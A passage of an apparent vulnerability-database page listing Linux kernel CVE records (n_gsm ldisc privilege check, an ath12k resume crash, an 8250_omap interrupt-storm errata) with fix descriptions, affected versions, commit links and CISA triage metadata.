            ],
            "url": "https://git.kernel.org/stable/c/67c37756898a5a6b2941a13ae7260c89b54e0d88"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/n_gsm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7d303dee473ba3529d75b63491e9963342107bed",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "7a529c9023a197ab3bf09bb95df32a3813f7ba58",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "ada28eb4b9561aab93942f3224a2e41d76fe57fa",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "2d154a54c58f9c8375bfbea9f7e51ba3bfb2e43a",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "2b85977977cbd120591b23c2450e90a5806a7167",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "67c37756898a5a6b2941a13ae7260c89b54e0d88",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/n_gsm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.35"
            },
            {
              "lessThan": "2.6.35",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.6",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: n_gsm: require CAP_NET_ADMIN to attach N_GSM0710 ldisc\n\nAny unprivileged user can attach N_GSM0710 ldisc, but it requires\nCAP_NET_ADMIN to create a GSM network anyway.\n\nRequire initial namespace CAP_NET_ADMIN to do that."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:17:51.560Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7d303dee473ba3529d75b63491e9963342107bed"
        },
        {
          "url": "https://git.kernel.org/stable/c/7a529c9023a197ab3bf09bb95df32a3813f7ba58"
        },
        {
          "url": "https://git.kernel.org/stable/c/ada28eb4b9561aab93942f3224a2e41d76fe57fa"
        },
        {
          "url": "https://git.kernel.org/stable/c/2d154a54c58f9c8375bfbea9f7e51ba3bfb2e43a"
        },
        {
          "url": "https://git.kernel.org/stable/c/2b85977977cbd120591b23c2450e90a5806a7167"
        },
        {
          "url": "https://git.kernel.org/stable/c/67c37756898a5a6b2941a13ae7260c89b54e0d88"
        }
      ],
      "title": "tty: n_gsm: require CAP_NET_ADMIN to attach N_GSM0710 ldisc",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52880",
    "datePublished": "2024-05-24T15:33:17.439Z",
    "dateReserved": "2024-05-21T15:35:00.781Z",
    "dateUpdated": "2026-01-05T10:17:51.560Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40979 (GCVE-0-2024-40979)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:32 – Updated: 2025-05-04 09:19

Title

wifi: ath12k: fix kernel crash during resume

Summary

In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: fix kernel crash during resume Currently during resume, QMI target memory is not properly handled, resulting in kernel crash in case DMA remap is not supported: BUG: Bad page state in process kworker/u16:54 pfn:36e80 page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x36e80 page dumped because: nonzero _refcount Call Trace: bad_page free_page_is_bad_report __free_pages_ok __free_pages dma_direct_free dma_free_attrs ath12k_qmi_free_target_mem_chunk ath12k_qmi_msg_mem_request_cb The reason is: Once ath12k module is loaded, firmware sends memory request to host. In case DMA remap not supported, ath12k refuses the first request due to failure in allocating with large segment size: ath12k_pci 0000:04:00.0: qmi firmware request memory request ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 7077888 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 8454144 ath12k_pci 0000:04:00.0: qmi dma allocation failed (7077888 B type 1), will try later with small size ath12k_pci 0000:04:00.0: qmi delays mem_request 2 ath12k_pci 0000:04:00.0: qmi firmware request memory request Later firmware comes back with more but small segments and allocation succeeds: ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 262144 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288 ath12k_pci 0000:04:00.0: qmi mem seg type 4 size 65536 ath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288 Now ath12k is working. If suspend is triggered, firmware will be reloaded during resume. As same as before, firmware requests two large segments at first. In ath12k_qmi_msg_mem_request_cb() segment count and size are assigned: ab->qmi.mem_seg_count == 2 ab->qmi.target_mem[0].size == 7077888 ab->qmi.target_mem[1].size == 8454144 Then allocation failed like before and ath12k_qmi_free_target_mem_chunk() is called to free all allocated segments. Note the first segment is skipped because its v.addr is cleared due to allocation failure: chunk->v.addr = dma_alloc_coherent() Also note that this leaks that segment because it has not been freed. While freeing the second segment, a size of 8454144 is passed to dma_free_coherent(). However remember that this segment is allocated at the first time firmware is loaded, before suspend. So its real size is 524288, much smaller than 8454144. As a result kernel found we are freeing some memory which is in use and thus cras ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/bb50a4e711ff95348…
	https://git.kernel.org/stable/c/303c017821d88ebad…

Impacted products

Vendor

Product

Version

Linux

Affected: d889913205cf7ebda905b1e62c5867ed4e39f6c2 , < bb50a4e711ff95348ad53641acb1306d89eb4c3a (git)
Affected: d889913205cf7ebda905b1e62c5867ed4e39f6c2 , < 303c017821d88ebad887814114d4e5966d320b28 (git)

Linux

Affected: 6.3
Unaffected: 0 , < 6.3 (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:39:55.885Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bb50a4e711ff95348ad53641acb1306d89eb4c3a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/303c017821d88ebad887814114d4e5966d320b28"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40979",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:02:27.015778Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:21.625Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/ath/ath12k/core.c",
            "drivers/net/wireless/ath/ath12k/qmi.c",
            "drivers/net/wireless/ath/ath12k/qmi.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "bb50a4e711ff95348ad53641acb1306d89eb4c3a",
              "status": "affected",
              "version": "d889913205cf7ebda905b1e62c5867ed4e39f6c2",
              "versionType": "git"
            },
            {
              "lessThan": "303c017821d88ebad887814114d4e5966d320b28",
              "status": "affected",
              "version": "d889913205cf7ebda905b1e62c5867ed4e39f6c2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/ath/ath12k/core.c",
            "drivers/net/wireless/ath/ath12k/qmi.c",
            "drivers/net/wireless/ath/ath12k/qmi.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.3"
            },
            {
              "lessThan": "6.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix kernel crash during resume\n\nCurrently during resume, QMI target memory is not properly handled, resulting\nin kernel crash in case DMA remap is not supported:\n\nBUG: Bad page state in process kworker/u16:54  pfn:36e80\npage: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x36e80\npage dumped because: nonzero _refcount\nCall Trace:\n bad_page\n free_page_is_bad_report\n __free_pages_ok\n __free_pages\n dma_direct_free\n dma_free_attrs\n ath12k_qmi_free_target_mem_chunk\n ath12k_qmi_msg_mem_request_cb\n\nThe reason is:\nOnce ath12k module is loaded, firmware sends memory request to host. In case\nDMA remap not supported, ath12k refuses the first request due to failure in\nallocating with large segment size:\n\nath12k_pci 0000:04:00.0: qmi firmware request memory request\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 7077888\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 8454144\nath12k_pci 0000:04:00.0: qmi dma allocation failed (7077888 B type 1), will try later with small size\nath12k_pci 0000:04:00.0: qmi delays mem_request 2\nath12k_pci 0000:04:00.0: qmi firmware request memory request\n\nLater firmware comes back with more but small segments and allocation\nsucceeds:\n\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 262144\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 524288\nath12k_pci 0000:04:00.0: qmi mem seg type 4 size 65536\nath12k_pci 0000:04:00.0: qmi mem seg type 1 size 524288\n\nNow ath12k is working. If suspend is triggered, firmware will be reloaded\nduring resume. As same as before, firmware requests two large segments at\nfirst. In ath12k_qmi_msg_mem_request_cb() segment count and size are\nassigned:\n\n\tab-\u003eqmi.mem_seg_count == 2\n\tab-\u003eqmi.target_mem[0].size == 7077888\n\tab-\u003eqmi.target_mem[1].size == 8454144\n\nThen allocation failed like before and ath12k_qmi_free_target_mem_chunk()\nis called to free all allocated segments. Note the first segment is skipped\nbecause its v.addr is cleared due to allocation failure:\n\n\tchunk-\u003ev.addr = dma_alloc_coherent()\n\nAlso note that this leaks that segment because it has not been freed.\n\nWhile freeing the second segment, a size of 8454144 is passed to\ndma_free_coherent(). However remember that this segment is allocated at\nthe first time firmware is loaded, before suspend. So its real size is\n524288, much smaller than 8454144. As a result kernel found we are freeing\nsome memory which is in use and thus cras\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:19:15.683Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/bb50a4e711ff95348ad53641acb1306d89eb4c3a"
        },
        {
          "url": "https://git.kernel.org/stable/c/303c017821d88ebad887814114d4e5966d320b28"
        }
      ],
      "title": "wifi: ath12k: fix kernel crash during resume",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40979",
    "datePublished": "2024-07-12T12:32:14.902Z",
    "dateReserved": "2024-07-12T12:17:45.604Z",
    "dateUpdated": "2025-05-04T09:19:15.683Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42095 (GCVE-0-2024-42095)

Vulnerability from cvelistv5 – Published: 2024-07-29 17:39 – Updated: 2025-11-03 22:01

Title

serial: 8250_omap: Implementation of Errata i2310

Summary

In the Linux kernel, the following vulnerability has been resolved: serial: 8250_omap: Implementation of Errata i2310 As per Errata i2310[0], Erroneous timeout can be triggered, if this Erroneous interrupt is not cleared then it may leads to storm of interrupts, therefore apply Errata i2310 solution. [0] https://www.ti.com/lit/pdf/sprz536 page 23

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/cb879300669881970…
	https://git.kernel.org/stable/c/87257a28271c828a9…
	https://git.kernel.org/stable/c/98840e410d53329f5…
	https://git.kernel.org/stable/c/e67d7f38008e56fb6…
	https://git.kernel.org/stable/c/6270051f656004ca5…
	https://git.kernel.org/stable/c/9d141c1e615795eeb…

Impacted products

Vendor

Product

Version

Linux

Affected: 9443acbd251f366804b20a27be72ba67df532cb1 , < cb879300669881970eabebe64bd509dbbe42b9de (git)
Affected: b67e830d38fa9335d927fe67e812e3ed81b4689c , < 87257a28271c828a98f762bf2dd803c1793d2b5b (git)
Affected: b67e830d38fa9335d927fe67e812e3ed81b4689c , < 98840e410d53329f5331ecdce095e740791963d0 (git)
Affected: b67e830d38fa9335d927fe67e812e3ed81b4689c , < e67d7f38008e56fb691b6a72cadf16c107c2f48b (git)
Affected: b67e830d38fa9335d927fe67e812e3ed81b4689c , < 6270051f656004ca5cde644c73cb1fa4d718792e (git)
Affected: b67e830d38fa9335d927fe67e812e3ed81b4689c , < 9d141c1e615795eeb93cd35501ad144ee997a826 (git)
Affected: bf1bcca53c35a40976afbdd40aaea9424154f57b (git)
Affected: ed87ec89b7f6071de06380a0216e6aa420eb9742 (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:29.111Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cb879300669881970eabebe64bd509dbbe42b9de"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/87257a28271c828a98f762bf2dd803c1793d2b5b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/98840e410d53329f5331ecdce095e740791963d0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e67d7f38008e56fb691b6a72cadf16c107c2f48b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6270051f656004ca5cde644c73cb1fa4d718792e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9d141c1e615795eeb93cd35501ad144ee997a826"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42095",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:18:24.897254Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:00.606Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/serial/8250/8250_omap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "cb879300669881970eabebe64bd509dbbe42b9de",
              "status": "affected",
              "version": "9443acbd251f366804b20a27be72ba67df532cb1",
              "versionType": "git"
            },
            {
              "lessThan": "87257a28271c828a98f762bf2dd803c1793d2b5b",
              "status": "affected",
              "version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
              "versionType": "git"
            },
            {
              "lessThan": "98840e410d53329f5331ecdce095e740791963d0",
              "status": "affected",
              "version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
              "versionType": "git"
            },
            {
              "lessThan": "e67d7f38008e56fb691b6a72cadf16c107c2f48b",
              "status": "affected",
              "version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
              "versionType": "git"
            },
            {
              "lessThan": "6270051f656004ca5cde644c73cb1fa4d718792e",
              "status": "affected",
              "version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
              "versionType": "git"
            },
            {
              "lessThan": "9d141c1e615795eeb93cd35501ad144ee997a826",
              "status": "affected",
              "version": "b67e830d38fa9335d927fe67e812e3ed81b4689c",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "bf1bcca53c35a40976afbdd40aaea9424154f57b",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "ed87ec89b7f6071de06380a0216e6aa420eb9742",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/serial/8250/8250_omap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "5.10.50",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.12.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.13.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: 8250_omap: Implementation of Errata i2310\n\nAs per Errata i2310[0], Erroneous timeout can be triggered,\nif this Erroneous interrupt is not cleared then it may leads\nto storm of interrupts, therefore apply Errata i2310 solution.\n\n[0] https://www.ti.com/lit/pdf/sprz536 page 23"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:57:35.598Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/cb879300669881970eabebe64bd509dbbe42b9de"
        },
        {
          "url": "https://git.kernel.org/stable/c/87257a28271c828a98f762bf2dd803c1793d2b5b"
        },
        {
          "url": "https://git.kernel.org/stable/c/98840e410d53329f5331ecdce095e740791963d0"
        },
        {
          "url": "https://git.kernel.org/stable/c/e67d7f38008e56fb691b6a72cadf16c107c2f48b"
        },
        {
          "url": "https://git.kernel.org/stable/c/6270051f656004ca5cde644c73cb1fa4d718792e"
        },
        {
          "url": "https://git.kernel.org/stable/c/9d141c1e615795eeb93cd35501ad144ee997a826"
        }
      ],
      "title": "serial: 8250_omap: Implementation of Errata i2310",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42095",
    "datePublished": "2024-07-29T17:39:30.948Z",
    "dateReserved": "2024-07-29T15:50:41.173Z",
    "dateUpdated": "2025-11-03T22:01:29.111Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36938 (GCVE-0-2024-36938)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:29 – Updated: 2025-05-04 09:12

Title

bpf, skmsg: Fix NULL pointer dereference in sk_psock_skb_ingress_enqueue

Summary

